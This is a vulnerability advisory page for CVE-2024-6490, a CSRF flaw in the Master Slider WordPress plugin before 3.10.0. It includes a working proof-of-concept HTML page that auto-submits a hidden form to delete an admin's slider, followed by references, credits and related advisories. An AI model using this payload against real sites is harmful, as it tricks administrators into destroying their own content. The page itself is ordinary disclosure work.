Master Slider < 3.10.0 – CSRF to slider deletion | CVE 2024-6490 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks when deleting sliders, which could allow attackers to make logged in admin to perform such action via a CSRF attack

Proof of Concept

<html>



  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php">

      <input type="hidden" name="page" value="master&#45;slider" />

      <input type="hidden" name="action" value="delete" />

      <input type="hidden" name="slider&#95;id" value="4" />

      <input type="hidden" name="paged" value="" />

      <input type="submit" value="Submit request" />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>

Affects Plugins

Fixed in 3.10.0

References

CVE

URL

https://research.cleantalk.org/cve-2024-6490/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://www.linkedin.com/in/dmitriy-ignatyev-8a9189267/

Verified

Yes

WPVDB ID

5a56e5aa-841d-4be5-84da-4c3b7602f053

Timeline

Publicly Published

2024-07-05 (about 1 year ago)

Added

2024-07-05 (about 1 year ago)

Last Updated

2024-12-18 (about 1 year ago)

Other

Published

Title

Published

2024-05-29

Title

WP To Do <= 1.3.0 - Cross-Site Request Forgery via wptodo_settings

Published

2024-11-18

Title

Buying Buddy IDX CRM < 2.0.0 - PHP Object Injection via CSRF

Published

2023-05-25

Title

Product Gallery Slider for WooCommerce < 2.2.9 - Cross-Site Request Forgery (CSRF)

Published

2024-07-04

Title

Rara Business < 1.2.6 - Cross-Site Request Forgery to Notice Dismissal

Published

2025-06-27

Title

RSS Digest <= 1.5 - Cross-Site Request Forgery